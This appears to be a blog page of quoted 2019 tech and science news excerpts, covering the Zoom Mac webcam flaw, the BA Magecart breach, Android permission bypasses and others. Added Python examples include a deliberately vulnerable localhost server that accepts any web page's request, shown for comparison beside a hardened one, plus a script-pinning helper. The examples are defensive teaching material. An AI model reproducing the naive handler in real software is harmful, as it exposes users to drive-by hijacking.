So for the new G7 X III, it seems the influencers have influenced Canon, because one of the camera’s new standout features is the ability to natively record vertical videos without rotating the footage in post. Using a new built-in gyro, the G7 X III can determine the camera’s orientation and then embed that info into a clip’s metadata, which means filming vertical videos for your Instagram stories on the G7 X III is as simple as turning the camera sideways.

And if that’s not enough to excite attendees of VidCon 2019, the vlogger convention where the $750 G7 X III is making its official debut, Canon also gave the camera the ability to livestream video directly to YouTube over wifi via the company’s Image Gateway software. The G7 X III also comes with a built-in microphone jack for vloggers who aren’t satisfied with the camera’s on-board audio, and a 3-inch touchscreen that can flip up 180 degrees so that vloggers can check their composition while they’re filming themselves.

Source: Canon Stabs Tradition in the Back With Camera That Supports Vertical Video

Indoor carbon dioxide levels could be a health hazard, scientists warn

Indoor levels of carbon dioxide could be clouding our thinking and may even pose a wider danger to human health, researchers say.

While air pollutants such as tiny particles and nitrogen oxides have been the subject of much research, there have been far fewer studies looking into the health impact of CO2.

However, the authors of the latest study – which reviews current evidence on the issue – say there is a growing body of research suggesting levels of CO2 that can be found in bedrooms, classrooms and offices might have harmful effects on the body, including affecting cognitive performance.

“There is enough evidence to be concerned, not enough to be alarmed. But there is no time to waste,” said Dr Michael Hernke, a co-author of the study from the University of Wisconsin-Madison, stressing further research was needed.

Writing in the journal Nature Sustainability, Hernke and colleagues report that they considered 18 studies of the levels of CO2 humans are exposed to, as well as its health impacts on both humans and animals.

Traditionally, the team say, it had been thought that CO2 levels would need to reach a very high concentration of at least 5,000 parts per million (ppm) before they would affect human health. But a growing body of research suggests CO2 levels as low as 1,000ppm could cause health problems, even if exposure only lasts for a few hours.

The team say crowded or poorly ventilated classrooms, office environments and bedrooms have all been found to have levels of CO2 that exceed 1,000ppm, and are spaces that people often remain in for many hours at a time. Air-conditioned trains and planes have also been found to exceed 1,000ppm.

[…]

The team found a number of studies have looked at the impact of such levels on human cognitive performance and productivity. In one study of 24 employees, cognitive scores were 50% lower when the participants were exposed to 1,400ppm of CO2 compared with 550ppm during a working day.

The team additionally looked at the impact of CO2 levels on animals, finding that a few hours’ exposure to 2,000 ppm was linked to inflammatory responses that could lead to damage to blood vessels. There is also tentative evidence suggesting that prolonged exposure to levels between 2,000 and 3,000ppm is linked to effects including stress, kidney calcification and bone demineralisation.

Source: Indoor carbon dioxide levels could be a health hazard, scientists warn | Environment | The Guardian

Another reason to limit creation of it

Serious Security Flaw With Teleconferencing App Zoom Allows Websites to Hijack Mac Webcams – and you can’t fix it by uninstalling

On Monday, security researcher Jonathan Leitschuh publicly disclosed a serious zero-day vulnerability in the conferencing software Zoom. On Mac computers, Zoom apparently implements its click-to-join feature, which lets users go directly to a video meeting from a browser link, by installing a local web server that runs as a background process and “accepts requests regular browsers wouldn’t,” per the Verge. As a result, any website could hijack Zoom to force a Mac user into a call without their permission, with the webcam activated unless a specific setting was enabled.

Worse, Leitschuh wrote that the local web server persists even if Zoom is uninstalled and is capable of reinstalling the app on its own, and that when he contacted the company they did little to resolve the issues.

In a Medium post on Monday, Leitschuh provided a demo in the form of a link that, when clicked, took Mac users who have ever installed the app to a conference room with their video cameras activated (it’s here, if you must try yourself). Leitschuh noted that the code to do this can be embedded in any website as well as “in malicious ads, or it could be used as a part of a phishing campaign.” Additionally, Leitschuh wrote that even if users uninstall Zoom, the insecure local web server persists and “will happily re-install the Zoom client for you, without requiring any user interaction on your behalf besides visiting a webpage.”

This implementation leaves open other nefarious ways to abuse the local web server, per the Verge:

Turning on your camera is bad enough, but the existence of the web server on their computers could open up more significant problems for Mac users. For example, in an older version of Zoom (since patched), it was possible to enact a denial of service attack on Macs by constantly pinging the web server: “By simply sending repeated GET requests for a bad number, Zoom app would constantly request ‘focus’ from the OS,” Leitschuh writes.
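The underlying design flaw is generic to any helper that listens on localhost: the browser’s same-origin policy stops a page from reading the reply, not from sending the request, so a plain GET fired from an image tag on any site reaches the helper unchallenged. The following is an added example, not Zoom’s code; the /launch path, the confno parameter and the X-Local-Token header are assumptions. It runs a naive handler that reproduces the class of flaw described above next to a hardened one that requires a per-install secret a web page cannot obtain, and drives both the way a malicious page and local software would.

```python
"""A loopback helper server is reachable from any web page; only a secret the page
cannot know keeps it from being driven remotely.

Added example, not Zoom's code. The /launch path, the confno parameter and the
X-Local-Token header are assumptions; the pattern applies to any localhost HTTP
helper.
"""
import http.client
import os
import secrets
import tempfile
import threading
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from urllib.parse import parse_qs, urlparse

LAUNCHED = []  # stands in for "joined meeting N with the camera on"


class NaiveHandler(BaseHTTPRequestHandler):
    """Vulnerable: honours any GET /launch?confno=N. A page on any site can fire it with
    <img src="http://127.0.0.1:PORT/launch?confno=N">; a plain GET needs no preflight."""
    name = "naive"

    def do_GET(self):
        url = urlparse(self.path)
        if url.path != "/launch":
            return self._reply(404, "not found")
        confno = parse_qs(url.query).get("confno", [""])[0]
        LAUNCHED.append((self.name, confno))
        self._reply(200, "joining " + confno)

    def _reply(self, code, text):
        body = text.encode()
        self.send_response(code)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the demo quiet
        pass


class HardenedHandler(NaiveHandler):
    """Requires a per-install random token in a custom header. A browser cannot add a custom
    header cross-origin without a CORS preflight (refused below) and cannot read the 0600
    token file, so only local software can pass. An Origin header, when present, proves the
    request came from a web page and is refused; its absence proves nothing, so the token is
    the real control."""
    name = "hardened"
    token = ""  # set before the server starts

    def do_GET(self):
        if self.headers.get("Origin") is not None:
            return self._reply(403, "browser-originated request refused")
        presented = self.headers.get("X-Local-Token", "")
        if not self.token or not secrets.compare_digest(presented, self.token):
            return self._reply(401, "missing or wrong local token")
        super().do_GET()

    def do_OPTIONS(self):  # CORS preflight: never approve
        self._reply(403, "no cross-origin access")


def start(handler_cls):
    srv = ThreadingHTTPServer(("127.0.0.1", 0), handler_cls)  # ephemeral port
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def get(port, path, headers=None):
    """Send one GET the way a page (no headers) or local software (token header) would."""
    conn = http.client.HTTPConnection("127.0.0.1", port, timeout=5)
    conn.request("GET", path, headers=headers or {})
    resp = conn.getresponse()
    status = resp.status
    resp.read()
    conn.close()
    return status


def write_token(path):
    """Fresh random token in a file only this user can read (mode 0600)."""
    token = secrets.token_hex(16)
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
    with os.fdopen(fd, "w") as f:
        f.write(token)
    return token


def demo():
    """Drive both servers; returns the HTTP status each request got and what was launched."""
    del LAUNCHED[:]
    results = {}
    naive = start(NaiveHandler)
    results["naive_from_web"] = get(naive.server_port, "/launch?confno=123")  # 200: hijacked
    naive.shutdown()
    naive.server_close()

    HardenedHandler.token = write_token(os.path.join(tempfile.mkdtemp(), "local-token"))
    hard = start(HardenedHandler)
    port = hard.server_port
    results["hard_from_web"] = get(port, "/launch?confno=123")
    results["hard_from_page_with_origin"] = get(port, "/launch?confno=123", {"Origin": "https://evil.example"})
    results["hard_local"] = get(port, "/launch?confno=123", {"X-Local-Token": HardenedHandler.token})
    hard.shutdown()
    hard.server_close()
    results["launched"] = list(LAUNCHED)
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The better fix is the one the page implies: do not leave a listener behind at all, and certainly not one that outlives the application it serves. If a helper must exist, the token-in-a-0600-file pattern above is the minimum, and it only holds as long as nothing else on the machine leaks that token.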

According to Leitschuh, he contacted Zoom on March 26, saying he would disclose the exploit in 90 days. Zoom did issue a “quick fix” patch that only disabled “a meeting creator’s ability to automatically enable a participants video by default,” he added, though this was far from a complete solution (and did nothing to negate the “ability for an attacker to forcibly join to a call anyone visiting a malicious site”) and only came in mid-June.

On July 7, he wrote, a “regression in the fix” caused it to stop working, and though Zoom issued another patch on Sunday, he was able to work around it.

Source: Serious Security Flaw With Teleconferencing App Could Allow Websites to Hijack Mac Webcams

More than 1,000 Android apps harvest data even after you deny permissions

Permissions on Android apps are intended to be gatekeepers for how much data your device gives up. If you don’t want a flashlight app to be able to read through your call logs, you should be able to deny that access. But even when you say no, many apps find a way around: Researchers discovered more than 1,000 apps that skirted restrictions, allowing them to gather precise geolocation data and phone identifiers behind your back.

[…]

Researchers from the International Computer Science Institute found up to 1,325 Android apps that were gathering data from devices even after people explicitly denied them permission. Serge Egelman, director of usable security and privacy research at the ICSI, presented the study in late June at the Federal Trade Commission’s PrivacyCon.

“Fundamentally, consumers have very few tools and cues that they can use to reasonably control their privacy and make decisions about it,” Egelman said at the conference. “If app developers can just circumvent the system, then asking consumers for permission is relatively meaningless.”

[…]

Egelman said the researchers notified Google about these issues last September, as well as the FTC. Google said it would be addressing the issues in Android Q, which is expected to be released this year.

The update will address the issue by hiding location information in photos from apps and requiring any apps that access Wi-Fi to also have permission for location data, according to Google.

[…]

Researchers found that Shutterfly, a photo-editing app, had been gathering GPS coordinates from photos and sending that data to its own servers, even when users declined to give the app permission to access location data.

[…]

Some apps were relying on other apps that were granted permission to look at personal data, piggybacking off their access to gather phone identifiers like your IMEI number. These apps would read through unprotected files on a device’s SD card and harvest data they didn’t have permission to access. So if you let other apps access personal data, and they stored it in a folder on the SD card, these spying apps would be able to take that information.

While there were only about 13 apps doing this, they were installed more than 17 million times, according to the researchers. This includes apps like Baidu’s Hong Kong Disneyland park app, researchers said.

Source: More than 1,000 Android apps harvest data even after you deny permissions – CNET

UK data regulator threatens British Airways with 747-sized fine for massive personal data blurt

The UK Information Commissioner’s Office has warned BA that it faces a whopping £183.39m fine following the theft of roughly half a million customer records from its website and mobile app servers.

The record-breaking fine – more or less the lower end of the price of one of the 747-400s in BA’s fleet – under European General Data Protection Regulation (GDPR), represents 1.5 per cent of BA’s world-wide revenue in 2017.

Information Commissioner Elizabeth Denham said: “People’s personal data is just that – personal. When an organisation fails to protect it from loss, damage or theft it is more than an inconvenience. That’s why the law is clear – when you are entrusted with personal data you must look after it. Those that don’t will face scrutiny from my office to check they have taken appropriate steps to protect fundamental privacy rights.”

The breach hit almost 500,000 people. The ICO statement says the breach is believed to have started in June 2018, whereas previous statements from BA said it began in late August. The data watchdog described the attack as diverting user traffic from BA’s site to a fraudulent site.

ICO investigators found a variety of information was compromised including log-in details, card numbers, names, addresses and travel information.

Sophisticated card skimming group Magecart, which also hit Ticketmaster, was blamed for the data slurp. The group is believed to have exploited third party scripts, possibly modified JavaScript, running on BA’s site to gain access to the airline’s payment system.

Such scripts are often used to support marketing and data tracking functions or running external ads.
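The practical defence against a modified third-party script is to pin what the browser is allowed to execute. The following is an added example, not BA’s or the ICO’s material: it computes Subresource Integrity hashes for reviewed script bodies, rewrites the script tags to carry them, reports any external script it could not pin, and derives a script-src Content-Security-Policy value from the hosts the page loads from. The page, the script bodies and the hosts are constructed placeholders.

```python
"""Pin third-party scripts with Subresource Integrity and a script-src CSP.

Added example, not BA's or the ICO's material. The page, script bodies and hosts
below are constructed. Pinning does not stop a first-party compromise, but a
silently modified external script then fails to load instead of running.
"""
import base64
import hashlib
import hmac
import re

SCRIPT_SRC_RE = re.compile(r"""<script\b([^>]*?)\ssrc\s*=\s*["']([^"']+)["']([^>]*)>""", re.I)
SRI_ALGOS = ("sha256", "sha384", "sha512")


def sri_hash(content, algo="sha384"):
    """integrity= value for a script body: '<algo>-<base64 digest>'."""
    if algo not in SRI_ALGOS:
        raise ValueError("SRI allows only sha256/sha384/sha512")
    digest = hashlib.new(algo, content).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def verify_sri(content, integrity):
    """What the browser does before executing: recompute and compare in constant time."""
    algo = integrity.split("-", 1)[0]
    if algo not in SRI_ALGOS:
        return False
    return hmac.compare_digest(sri_hash(content, algo), integrity)


def pin_scripts(html, fetched):
    """Add integrity= and crossorigin= to each <script src> whose body is in `fetched`
    (url -> bytes, as reviewed at deploy time). Returns (html, urls left unpinned)."""
    unpinned = []

    def repl(m):
        before, src, after = m.group(1), m.group(2), m.group(3)
        if "integrity=" in (before + after).lower():
            return m.group(0)  # already pinned; leave it
        body = fetched.get(src)
        if body is None:
            unpinned.append(src)  # content not reviewed: cannot pin safely
            return m.group(0)
        return (f'<script{before} src="{src}" integrity="{sri_hash(body)}" '
                f'crossorigin="anonymous"{after}>')

    return SCRIPT_SRC_RE.sub(repl, html), unpinned


def script_src_policy(html):
    """Content-Security-Policy value allowing the page's own origin and only the script hosts it uses."""
    matches = (re.match(r"https?://[^/]+", src) for _, src, _ in SCRIPT_SRC_RE.findall(html))
    hosts = sorted({m.group(0) for m in matches if m})
    return "script-src 'self' " + " ".join(hosts)


# Constructed page and reviewed script bodies (not BA's site).
SAMPLE_PAGE = ('<script src="https://cdn.example-analytics.net/tracker.js"></script>\n'
               '<script src="https://ads.example-ads.org/loader.js"></script>\n')
SAMPLE_BODIES = {
    "https://cdn.example-analytics.net/tracker.js": b"window.track = function (e) { /* ... */ };\n",
}

if __name__ == "__main__":
    pinned, unpinned = pin_scripts(SAMPLE_PAGE, SAMPLE_BODIES)
    print(pinned)
    print("could not pin:", unpinned)
    print("Content-Security-Policy:", script_src_policy(SAMPLE_PAGE))
```

A script left in the “could not pin” list is one whose content changes under the provider’s control; either it moves to a self-hosted, reviewed copy, or the page accepts that it runs whatever that host serves next.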

The Reg revealed that BA parent company IAG was in talks with staff to outsource cyber security to IBM just before the hack was carried out.

Source: UK data regulator threatens British Airways with 747-sized fine for massive personal data blurt • The Register

AMD Ryzen 7 3700X + Ryzen 9 3900X Offer Incredible Linux Performance – if you can get it to boot. Which newer distros seemingly can’t

On newer Linux distributions, there’s a hard regression, either within the kernel or, more likely, in some cross-kernel/user-space interaction, leaving newer Linux distributions unbootable.

While Ubuntu 18.04 LTS and older Linux distributions boot Zen 2, to date I have not been able to successfully boot the likes of Ubuntu 19.04, Manjaro Linux, and Fedora Workstation 31. On all newer Linux distributions I’ve tried on two different systems built around the Ryzen 7 3700X and Ryzen 9 3900X, each time early in the boot process as soon as trying to start systemd services, all systemd services fail to start.

I’ve confirmed with AMD they do have an open issue surrounding “5.0.9” (the stock kernel of Ubuntu 19.04) but as of writing hadn’t shed any light on the issue. AMD has said their testing has been mostly focused on Ubuntu 18.04 given its LTS status. I’ve also confirmed the same behavior with some other Windows reviewers who occasionally dabble with Linux.

So unfortunately not being able to boot newer Linux distributions is a huge pain. I’ve spent days trying different BIOS versions/options, different kernel command line parameters, and other options to no avail. On some Linux distributions after roughly 20~30 minutes of waiting after all systemd services fail to start, sometimes there will be a kernel panic but that hadn’t occurred on all systems at least not within that time-frame.

Source: AMD Ryzen 7 3700X + Ryzen 9 3900X Offer Incredible Linux Performance But With A Big Caveat Review – Phoronix

Dynamic Wood Sculptures Carved to Look Like Pixelated Glitches

Taiwanese artist Hsu Tung Han, however, uses pixelated glitches as inspiration for his latest series of stunning wooden sculptures.

By carving delicate block-shaped details that separate from various parts of the sculpture, Han successfully creates the bizarre yet magnificently original illusion of pixelation in 3D form.

He applies this technique masterfully on his most recent finished product, which depicts a snorkeler underwater.

Here, the wooden ‘pixels’ seem to represent the water that surrounds and submerges the snorkeling man.

Han has been posting photos of his carved sculptures on Flickr since 2006, and has developed a unique niche for blending traditional styles of woodwork with modern artistic elements.

Source: Dynamic Wood Sculptures Carved to Look Like Pixelated Glitches – Stay Wild Moon Child

Posted in Art